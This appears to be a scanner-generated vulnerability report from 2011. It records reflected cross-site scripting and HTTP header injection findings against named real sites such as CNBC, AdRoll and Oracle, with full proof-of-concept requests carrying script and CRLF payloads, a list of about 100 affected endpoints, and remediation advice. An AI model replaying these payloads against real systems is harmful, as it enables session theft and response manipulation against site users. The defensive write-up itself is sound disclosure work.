XSS, Reflected Cross Site Scripting, CWE-79, CAPEC-86, DORK, GHDB, BHDB, 09062011-02

The value of the JSESSIONID cookie submitted to the URL /snas/api/getRemoteDomainCookies is copied into the HTML document as plain text between tags at the URL /snas/api/getRemoteDomainCookies. The payload a5fc9<script>alert(1)</script>0f409039ab9 was submitted in the JSESSIONID cookie. This input was returned unmodified in a subsequent request for the URL /snas/api/getRemoteDomainCookies.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Issue background

Stored cross-site scripting vulnerabilities arise when data which originated from any tainted source is copied into the application's responses in an unsafe way. An attacker can use the vulnerability to inject malicious JavaScript code into the application, which will execute within the browser of any user who views the relevant application content.

The attacker-supplied code can perform a wide variety of actions, such as stealing victims' session tokens or login credentials, performing arbitrary actions on their behalf, and logging their keystrokes.

Methods for introducing malicious content include any function where request parameters or headers are processed and stored by the application, and any out-of-band channel whereby data can be introduced into the application's processing space (for example, email messages sent over SMTP which are ultimately rendered within a web mail application).

Stored cross-site scripting flaws are typically more serious than reflected vulnerabilities because they do not require a separate delivery mechanism in order to reach target users, and they can potentially be exploited to create web application worms which spread exponentially amongst application users.

Note that automated detection of stored cross-site scripting vulnerabilities cannot reliably determine whether attacks that are persisted within the application can be accessed by any other user, only by authenticated users, or only by the attacker themselves. You should review the functionality in which the vulnerability appears to determine whether the application's behaviour can feasibly be used to compromise other application users.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:

Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc).

In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.

Request 1

GET /snas/api/getRemoteDomainCookies?callback=__nbcsnasadops.doSCallback HTTP/1.1
Host: snas.nbcuni.com
Proxy-Connection: keep-alive
Referer: http://data.cnbc.com/quotes/.DJIA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|27331A26051D3991-6000010800171907[CE]; JSESSIONID=6D56CDC00D764468C0E55EBDC52CFB15a5fc9<script>alert(1)</script>0f409039ab9

Request 2

Response 2

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:11:11 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8b DAV/2 mod_jk/1.2.30
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Set-Cookie: JSESSIONID=6D56CDC00D764468C0E55EBDC52CFB15a5fc9<script>alert(1)</script>0f409039ab9; Path=/
Cache-Control: max-age=10
Expires: Tue, 06 Sep 2011 15:11:21 GMT
Content-Length: 208
Content-Type: text/html

__nbcsnasadops.doSCallback({ "cookie":{"s_nr":"1313446468300","JSESSIONID":"6D56CDC00D764468C0E55EBDC52CFB15a5fc9<script>alert(1)</script>0f409039ab9","s_vi":"[CS]v1|27331A26051D3991-6000010800171907[CE]"}});

2. HTTP header injection previous next
There are 8 instances of this issue:

http://d.adroll.com/pixel/EBPLYDUJ5RCZ3C7MBENLBV/3CUMSMM7PFGSTPKIXDFOOO [REST URL parameter 2]
http://d.adroll.com/pixel/EBPLYDUJ5RCZ3C7MBENLBV/3CUMSMM7PFGSTPKIXDFOOO [REST URL parameter 3]
http://login.cnbc.com/tpauth/rest/authenticate [name of an arbitrarily supplied request parameter]
http://login.cnbc.com/tpauth/rest/authenticate [source parameter]
https://register.cnbc.com/memberCenter.do [name of an arbitrarily supplied request parameter]
https://register.cnbc.com/refreshlogin.jsp [name of an arbitrarily supplied request parameter]
https://register.cnbc.com/refreshlogin.jsp [source parameter]
https://register.cnbc.com/registerUser.do [name of an arbitrarily supplied request parameter]

Issue background

HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.

Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.

Issue remediation

If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.

2.1. http://d.adroll.com/pixel/EBPLYDUJ5RCZ3C7MBENLBV/3CUMSMM7PFGSTPKIXDFOOO [REST URL parameter 2] next

Summary

Severity:	High
Confidence:	Certain
Host:	http://d.adroll.com
Path:	/pixel/EBPLYDUJ5RCZ3C7MBENLBV/3CUMSMM7PFGSTPKIXDFOOO

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload 752c7%0d%0afa8ce4cf6fd was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /pixel/752c7%0d%0afa8ce4cf6fd/3CUMSMM7PFGSTPKIXDFOOO?pv=98794510029.25635&cookie=&keyw=ATG+e-commerce+solutio HTTP/1.1
Host: d.adroll.com
Proxy-Connection: keep-alive
Referer: http://www.shopify.com/?gclid=CK6YvLv4iKsCFSE8gwod-iiK3g
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __adroll=a93684bbe302491756ff3d9c64c60001

Response

HTTP/1.1 302 Moved Temporarily
Server: nginx/0.8.54
Date: Tue, 06 Sep 2011 15:32:47 GMT
Connection: keep-alive
Set-Cookie: __adroll=a93684bbe302491756ff3d9c64c60001afb11%00%0d%0a1aa9599e8bf; Version=1; Expires=Mon, 09 Sep 2013 07:00:00 GMT; Max-Age=432000000; Path=/
Pragma: no-cache
P3P: CP='NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR SAMa IND COM NAV'
Location: http://a.adroll.com/pixel/752c7
fa8ce4cf6fd/3CUMSMM7PFGSTPKIXDFOOO/4X7ERY5MVFDBLHMTRJRP2G.js:
Content-Length: 0
Cache-Control: no-store, no-cache, must-revalidate

2.2. http://d.adroll.com/pixel/EBPLYDUJ5RCZ3C7MBENLBV/3CUMSMM7PFGSTPKIXDFOOO [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://d.adroll.com
Path:	/pixel/EBPLYDUJ5RCZ3C7MBENLBV/3CUMSMM7PFGSTPKIXDFOOO

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload 36bd2%0d%0a9786dda38d3 was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /pixel/EBPLYDUJ5RCZ3C7MBENLBV/36bd2%0d%0a9786dda38d3?pv=98794510029.25635&cookie=&keyw=ATG+e-commerce+solutio HTTP/1.1
Host: d.adroll.com
Proxy-Connection: keep-alive
Referer: http://www.shopify.com/?gclid=CK6YvLv4iKsCFSE8gwod-iiK3g
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __adroll=a93684bbe302491756ff3d9c64c60001

Response

HTTP/1.1 302 Moved Temporarily
Server: nginx/0.8.54
Date: Tue, 06 Sep 2011 15:32:48 GMT
Connection: keep-alive
Set-Cookie: __adroll=a93684bbe302491756ff3d9c64c60001afb11%00%0d%0a1aa9599e8bf; Version=1; Expires=Mon, 09 Sep 2013 07:00:00 GMT; Max-Age=432000000; Path=/
Pragma: no-cache
P3P: CP='NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR SAMa IND COM NAV'
Location: http://a.adroll.com/retarget/EBPLYDUJ5RCZ3C7MBENLBV/36bd2
9786dda38d3/pixel.js:
Content-Length: 0
Cache-Control: no-store, no-cache, must-revalidate

2.3. http://login.cnbc.com/tpauth/rest/authenticate [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://login.cnbc.com
Path:	/tpauth/rest/authenticate

Issue detail

The name of an arbitrarily supplied request parameter is copied into the Location response header. The payload 294ce%0d%0adc6a298c2de was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.

Request

GET /tpauth/rest/authenticate?source=subscription&source_type=pro&apphome=http%3A%2F%2Fpro.cnbc.com%2Findex.asp&294ce%0d%0adc6a298c2de=1 HTTP/1.1
Host: login.cnbc.com
Proxy-Connection: keep-alive
Referer: http://pro.cnbc.com/index.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1380789371-1315338919989; cnbc_regional_cookie=US; __qseg=Q_D; TZM=-300; s_cc=true; s_nr=1315339339586; s_sq=nbcuglobal%2C%20nbcucnbcd%2C%20nbcucnbcbu%3D%2526pid%253DMember%252520Center%25257CPassword%252520Reset%25257CEmail%2526pidt%253D1%2526oid%253Dhttp%25253A//pro.cnbc.com/%2526ot%253DA

Response

HTTP/1.1 302 Moved Temporarily
Date: Tue, 06 Sep 2011 15:03:29 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19
Set-Cookie: JSESSIONID=D2C022C9CFF6DFB9157CD240DA8DE1A9; Path=/tpauth
Location: https://login.cnbc.com/cas/login?service=http%3A%2F%2Flogin.cnbc.com%2Ftpauth%2Fj_acegi_cas_security_check&source_type=pro&apphome=http%3A%2F%2Fpro.cnbc.com%2Findex.asp&294ce
dc6a298c2de=1&login_view=subscription
Content-Length: 0
Content-Type: text/plain

2.4. http://login.cnbc.com/tpauth/rest/authenticate [source parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://login.cnbc.com
Path:	/tpauth/rest/authenticate

Issue detail

The value of the source request parameter is copied into the Location response header. The payload 33200%0d%0a0f3f561d3b4 was submitted in the source parameter. This caused a response containing an injected HTTP header.

Request

GET /tpauth/rest/authenticate?source=33200%0d%0a0f3f561d3b4&source_type=pro&apphome=http%3A%2F%2Fpro.cnbc.com%2Findex.asp HTTP/1.1
Host: login.cnbc.com
Proxy-Connection: keep-alive
Referer: http://pro.cnbc.com/index.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1380789371-1315338919989; cnbc_regional_cookie=US; __qseg=Q_D; TZM=-300; s_cc=true; s_nr=1315339339586; s_sq=nbcuglobal%2C%20nbcucnbcd%2C%20nbcucnbcbu%3D%2526pid%253DMember%252520Center%25257CPassword%252520Reset%25257CEmail%2526pidt%253D1%2526oid%253Dhttp%25253A//pro.cnbc.com/%2526ot%253DA

Response

HTTP/1.1 302 Moved Temporarily
Date: Tue, 06 Sep 2011 15:03:00 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19
Location: https://login.cnbc.com/cas/login?service=http%3A%2F%2Flogin.cnbc.com%2Ftpauth%2Fj_acegi_cas_security_check&source_type=pro&apphome=http%3A%2F%2Fpro.cnbc.com%2Findex.asp&login_view=33200
0f3f561d3b4
Content-Length: 0
Content-Type: text/plain

2.5. https://register.cnbc.com/memberCenter.do [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://register.cnbc.com
Path:	/memberCenter.do

Issue detail

The name of an arbitrarily supplied request parameter is copied into the Location response header. The payload 4ef6d%0d%0a743079059dd was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.

Request

GET /memberCenter.do?4ef6d%0d%0a743079059dd=1 HTTP/1.1
Host: register.cnbc.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1380789371-1315338919989; cnbc_regional_cookie=US; s_cc=true; s_nr=1315339139226; s_sq=%5B%5BB%5D%5D; __qseg=Q_D

Response

HTTP/1.1 302 Moved Temporarily
Date: Tue, 06 Sep 2011 15:05:52 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19
Location: https://login.cnbc.com/cas/login?service=https%3A%2F%2Fregister.cnbc.com%2Fj_acegi_cas_security_check&4ef6d
743079059dd=1&login_view=register
Content-Length: 0
Connection: close
Content-Type: text/plain
Set-Cookie: pers_cookie_insert_cnbc.com_Prod_registration_servers_443=834785856.23040.0000; expires=Tue, 06-Sep-2011 18:05:52 GMT; path=/

2.6. https://register.cnbc.com/refreshlogin.jsp [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://register.cnbc.com
Path:	/refreshlogin.jsp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the Location response header. The payload d0ea7%0d%0a3c7455c6879 was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.

Request

GET /refreshlogin.jsp?source=header&service=http://www.cnbc.com/&d0ea7%0d%0a3c7455c6879=1 HTTP/1.1
Host: register.cnbc.com
Connection: keep-alive
Referer: http://www.cnbc.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1380789371-1315338919989; TZM=-300; JSESSIONID=30F7657E561A5A03E5B11ABE0843E7D5; s_cc=true; __qseg=Q_D; s_nr=1315339382427; s_sq=nbcuglobal%2C%20nbcucnbcd%2C%20nbcucnbcbu%3D%2526pid%253DFront%25257CHome%25257Chomeus%25257C15839285%25257CStock%252520Market%252520News%25252C%252520Business%252520News%25252C%252520Financial%25252C%252520Earni%2526pidt%253D1%2526oid%253Dhttp%25253A//www.cnbc.com/%252523%2526ot%253DA; cnbc_regional_cookie=US

Response

HTTP/1.1 302 Moved Temporarily
Date: Tue, 06 Sep 2011 15:03:20 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19
Location: https://login.cnbc.com/cas/login?service=https%3A%2F%2Fregister.cnbc.com%2Fj_acegi_cas_security_check&source=header&d0ea7
3c7455c6879=1&login_view=header
Content-Length: 0
Connection: close
Content-Type: text/plain
Set-Cookie: pers_cookie_insert_cnbc.com_Prod_registration_servers_443=834785856.23040.0000; expires=Tue, 06-Sep-2011 18:03:20 GMT; path=/

2.7. https://register.cnbc.com/refreshlogin.jsp [source parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://register.cnbc.com
Path:	/refreshlogin.jsp

Issue detail

The value of the source request parameter is copied into the Location response header. The payload 42dc1%0d%0ad1b7bab4e94 was submitted in the source parameter. This caused a response containing an injected HTTP header.

Request

GET /refreshlogin.jsp?source=42dc1%0d%0ad1b7bab4e94&service=http://www.cnbc.com/ HTTP/1.1
Host: register.cnbc.com
Connection: keep-alive
Referer: http://www.cnbc.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1380789371-1315338919989; TZM=-300; JSESSIONID=30F7657E561A5A03E5B11ABE0843E7D5; s_cc=true; __qseg=Q_D; s_nr=1315339382427; s_sq=nbcuglobal%2C%20nbcucnbcd%2C%20nbcucnbcbu%3D%2526pid%253DFront%25257CHome%25257Chomeus%25257C15839285%25257CStock%252520Market%252520News%25252C%252520Business%252520News%25252C%252520Financial%25252C%252520Earni%2526pidt%253D1%2526oid%253Dhttp%25253A//www.cnbc.com/%252523%2526ot%253DA; cnbc_regional_cookie=US

Response

HTTP/1.1 302 Moved Temporarily
Date: Tue, 06 Sep 2011 15:03:19 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19
Location: https://login.cnbc.com/cas/login?service=https%3A%2F%2Fregister.cnbc.com%2Fj_acegi_cas_security_check&source=42dc1%0D%0Ad1b7bab4e94&login_view=42dc1
d1b7bab4e94
Content-Length: 0
Connection: close
Content-Type: text/plain
Set-Cookie: pers_cookie_insert_cnbc.com_Prod_registration_servers_443=834785856.23040.0000; expires=Tue, 06-Sep-2011 18:03:19 GMT; path=/

2.8. https://register.cnbc.com/registerUser.do [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://register.cnbc.com
Path:	/registerUser.do

Issue detail

The name of an arbitrarily supplied request parameter is copied into the Location response header. The payload bc1b6%0d%0a38769824fca was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.

Request

GET /registerUser.do?bc1b6%0d%0a38769824fca=1 HTTP/1.1
Host: register.cnbc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Date: Tue, 06 Sep 2011 15:05:48 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19
Set-Cookie: JSESSIONID=8949562430B64F70CC4A99E0D5131B41; Path=/
Pragma: no-cache
Cache-Control: no-cache, no-store, must-revalidate
Cache-Control: pre-check=0, post-check=0
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Location: http://register.cnbc.com/refreshlogin.jsp?bc1b6
38769824fca=1
Content-Length: 0
Connection: close
Content-Type: text/html
Set-Cookie: pers_cookie_insert_cnbc.com_Prod_registration_servers_443=834785856.23040.0000; expires=Tue, 06-Sep-2011 18:05:48 GMT; path=/

3. Cross-site scripting (reflected) previous next
There are 100 instances of this issue:

http://ads.adsonar.com/adserving/getAds.jsp [pid parameter]
http://ads.adsonar.com/adserving/getAds.jsp [placementId parameter]
http://ads.adsonar.com/adserving/getAds.jsp [ps parameter]
http://ads.rnmd.net/getAds [adDiv parameter]
http://api-cdn.cnbc.com/api/chart/chart.asp [name of an arbitrarily supplied request parameter]
http://api-public.addthis.com/url/shares.json [callback parameter]
http://api.bizographics.com/v1/profile.json [api_key parameter]
http://api.bizographics.com/v1/profile.json [callback parameter]
http://api.bizographics.com/v1/profile.redirect [api_key parameter]
http://api.bizographics.com/v1/profile.redirect [callback_url parameter]
http://api.cnbc.com/api/chart/chart.asp [name of an arbitrarily supplied request parameter]
http://api.cnbc.com/api/movers/movers.asp [chartType parameter]
http://api.cnbc.com/api/movers/movers.asp [rowCount parameter]
http://api.viglink.com/api/ping [jsonp parameter]
http://b.scorecardresearch.com/beacon.js [c1 parameter]
http://b.scorecardresearch.com/beacon.js [c10 parameter]
http://b.scorecardresearch.com/beacon.js [c15 parameter]
http://b.scorecardresearch.com/beacon.js [c2 parameter]
http://b.scorecardresearch.com/beacon.js [c3 parameter]
http://b.scorecardresearch.com/beacon.js [c4 parameter]
http://b.scorecardresearch.com/beacon.js [c5 parameter]
http://b.scorecardresearch.com/beacon.js [c6 parameter]
http://blog.harbottle.com/dm/index.php [name of an arbitrarily supplied request parameter]
http://blog.ulf-wendel.de/ [name of an arbitrarily supplied request parameter]
http://c.brightcove.com/services/messagebroker/amf [3rd AMF string parameter]
http://cdn.krxd.net/config/ [site parameter]
http://content.plymedia.com/initialize [video parameter]
http://d7.zedo.com/jsc/d3/fl.js [l parameter]
http://d7.zedo.com/lar/v11-001/d7/jsc/flr.js [l parameter]
http://digg.com/submit [REST URL parameter 1]
http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getCourseDesc [dc parameter]
http://education.oracle.com/pls/web_prod-plq-dad/demandcapture_customer.customer_display [p_lang parameter]
http://education.oracle.com/pls/web_prod-plq-dad/demandcapture_customer.customer_display [p_wddi_id parameter]
http://education.oracle.com/pls/web_prod-plq-dad/header [lang parameter]
http://education.oracle.com/pls/web_prod-plq-dad/header [lang parameter]
http://education.oracle.com/pls/web_prod-plq-dad/show_desc.redirect [p_url parameter]
http://education.oracle.com/pls/web_prod-plq-dad/webreg_course_index.main [p_lang parameter]
http://education.oracle.com/pls/web_prod-plq-dad/webreg_course_index.main [p_lang parameter]
http://imp.fetchback.com/serve/fb/adtag.js [name of an arbitrarily supplied request parameter]
http://imp.fetchback.com/serve/fb/adtag.js [type parameter]
http://js.revsci.net/gateway/gw.js [csid parameter]
https://login.cnbc.com/cas/login [apphome parameter]
https://login.cnbc.com/cas/login [jsessionid parameter]
https://login.cnbc.com/cas/login [login_view parameter]
https://login.cnbc.com/cas/login [name of an arbitrarily supplied request parameter]
https://login.cnbc.com/cas/login [name of an arbitrarily supplied request parameter]
https://login.cnbc.com/cas/login [service parameter]
https://login.cnbc.com/cas/login [source parameter]
https://login.cnbc.com/cas/login [source_type parameter]
https://login.oracle.com/oam/server/sso/auth_cred_submit [request_id parameter]
https://login.oracle.com/oam/server/sso/auth_cred_submit [request_id parameter]
http://m.cnbc.com/ [name of an arbitrarily supplied request parameter]
http://m.cnbc.com/favicon.ico [REST URL parameter 1]
http://m.cnbc.com/mytest/ipecho.php [REST URL parameter 1]
http://m.cnbc.com/mytest/ipecho.php [REST URL parameter 2]
http://netsuite.tt.omtrdc.net/m2/netsuite/mbox/standard [mbox parameter]
http://pg.links.channelintelligence.com/pages/CBLJS.asp [sLinkJSData parameter]
http://pg.links.channelintelligence.com/pages/CBLJS.asp [sLinkJSData parameter]
http://ping.crowdscience.com/ping.js [m parameter]
http://pixel.adsafeprotected.com/jspix [anId parameter]
http://pixel.adsafeprotected.com/jspix [campId parameter]
http://pixel.adsafeprotected.com/jspix [name of an arbitrarily supplied request parameter]
http://pixel.adsafeprotected.com/jspix [pubId parameter]
http://quote.cnbc.com/quote-html-webservice/quote.htm [&symbols parameter]
http://search.cnbc.com/main.do [keywords parameter]
http://search.cnbc.com/main.do [keywords parameter]
http://search.cnbc.com/main.do [keywords parameter]
http://search.cnbc.com/main.do [keywords parameter]
http://search.cnbc.com/main.do [pubfreq parameter]
http://search.cnbc.com/main.do [pubfreq parameter]
http://search.cnbc.com/main.do [sort parameter]
http://search.cnbc.com/main.do [sort parameter]
http://serve.directdigitalllc.com/serve.php [click parameter]
http://serve.directdigitalllc.com/serve.php [name of an arbitrarily supplied request parameter]
http://snas.nbcuni.com/snas/api/getRemoteDomainCookies [callback parameter]
http://wd.sharethis.com/api/getCount2.php [cb parameter]
http://www.dove.us/Products/Hair/ [ba088%22%3E%3Cscript%3Eprompt(%22E-Mail?%22)%3C/script%3Ed91bc007f7 parameter]
http://www.dove.us/Products/Hair/ [name of an arbitrarily supplied request parameter]
http://www.harbottle.com/hnl/pages/hnl_search2.php [name of an arbitrarily supplied request parameter]
http://www.harbottle.com/hnl/pages/hnl_search2.php [search parameter]
http://www.harbottle.com/hnl/pages/hnl_search2.php/353c3%3E%3Cimg%20src%3da%20onerror%3dprompt(document.location)%3E9d536909165a5febf [REST URL parameter 4]
http://www.harbottle.com/hnl/pages/hnl_search2.php/353c3%3E%3Cimg%20src%3da%20onerror%3dprompt(document.location)%3E9d536909165a5febf [REST URL parameter 4]
http://www.harbottle.com/hnl/pages/hnl_search2.php/a [REST URL parameter 4]
http://www.harbottle.com/hnl/pages/hnl_search2.php/pix/Chambers%202011%20Firm%20Logo.jpg [REST URL parameter 5]
http://www.harbottle.com/hnl/pages/hnl_search2.php/pix/Chambers%202011%20Firm%20Logo.jpg [REST URL parameter 5]
http://www.harbottle.com/hnl/pages/hnl_search2.php/pix/L500%20Logo.gif [REST URL parameter 5]
http://www.harbottle.com/hnl/pages/hnl_search2.php/pix/L500%20Logo.gif [REST URL parameter 5]
http://www.harbottle.com/hnl/pages/pubs/479 [REST URL parameter 4]
http://www.harbottle.com/hnl/pages/pubs/479 [REST URL parameter 4]
http://www.linkedin.com/countserv/count/share [url parameter]
http://www.sapient.com/en-us/search.html [search parameter]
http://api.bizographics.com/v1/profile.json [Referer HTTP header]
http://pixel.adsafeprotected.com/jspix [Referer HTTP header]
http://optimized-by.rubiconproject.com/a/6451/11953/20435-15.js [ruid cookie]
http://optimized-by.rubiconproject.com/a/6451/11953/20435-2.js [ruid cookie]
http://optimized-by.rubiconproject.com/a/dk.html [ruid cookie]
http://optimized-by.rubiconproject.com/a/dk.js [ruid cookie]
http://snas.nbcuni.com/snas/api/getRemoteDomainCookies [JSESSIONID cookie]
http://snas.nbcuni.com/snas/api/getRemoteDomainCookies [s_nr cookie]
http://snas.nbcuni.com/snas/api/getRemoteDomainCookies [s_vi cookie]

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:

Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc).

3.1. http://ads.adsonar.com/adserving/getAds.jsp [pid parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ads.adsonar.com
Path:	/adserving/getAds.jsp

Issue detail

The value of the pid request parameter is copied into the HTML document as plain text between tags. The payload 1e863<script>alert(1)</script>03af89ea0d9 was submitted in the pid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

